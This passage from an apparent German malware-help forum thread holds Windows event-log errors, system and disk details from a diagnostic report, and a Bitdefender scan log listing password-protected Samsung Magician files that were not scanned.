Error: (05/19/2017 01:54:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/19/2017 01:54:14 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/19/2017 01:51:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x33fc
Startzeit der fehlerhaften Anwendung: 0x01d2d0963aa49603
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 5e8a5ef4-440c-434d-91c0-338b626dcfb0
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/18/2017 09:09:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/18/2017 09:09:09 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/18/2017 09:06:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x2304
Startzeit der fehlerhaften Anwendung: 0x01d2d009d6f7143d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 3df2ca2e-39a1-4eeb-abcd-e899ccd508a4
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/17/2017 09:21:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1b10
Startzeit der fehlerhaften Anwendung: 0x01d2cf42c69a45ef
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ea7d32bf-5e80-458b-9d7a-442387dd0ab9
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/17/2017 09:14:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/17/2017 09:11:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1894
Startzeit der fehlerhaften Anwendung: 0x01d2cf4162996d04
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4380628c-e8f1-4062-8c7c-6a315d1a7271
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:


Systemfehler:
=============
Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "SDWSCService" wurde aufgrund folgenden Fehlers nicht gestartet: 
Ein erforderliches Zertifikat befindet sich nicht im Gültigkeitszeitraum gemessen an der aktuellen Systemzeit oder dem Zeitstempel in der signierten Datei.

Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/17/2017 09:21:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (05/17/2017 09:11:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2017-05-19 14:42:06.322
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-19 14:42:06.321
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-19 14:42:06.311
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-19 14:42:06.309
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-19 14:24:55.328
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-19 13:56:04.713
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-19 13:51:23.446
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-19 13:51:23.415
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-18 22:49:46.723
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-18 22:49:46.684
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5651.35 MB
Summe virtueller Speicher: 14271.12 MB
Verfügbarer virtueller Speicher: 11138.57 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:109.28 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         
Ok. Musste gerade feststellen das die Bitdefender Protokoll Datei unbrauchbar ist. Die steht nur geschrieben welche Dateien nicht gescannt wurden.

Code:
ATTFilter
BitDefender Log File

Product : Bitdefender Internet Security 2017
Scanning task : Vollständiger System-Scan
Log date : Freitag, 19. Mai 2017 15:18:56
Log path : C:\ProgramData\Bitdefender\Desktop\Profiles\Logs\dcf483c4-26d0-4e6f-ba28-6a53a00adae1\1495198083_1_01.xml
Scan Paths:
Path : C:\
Path : D:\
[-]Scan Results
[-]Objects that were not scanned:
Object Path
Reason
Final Status
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Help.pdf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/RELEASE_NOTES.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/install.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/LIMITATIONS.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
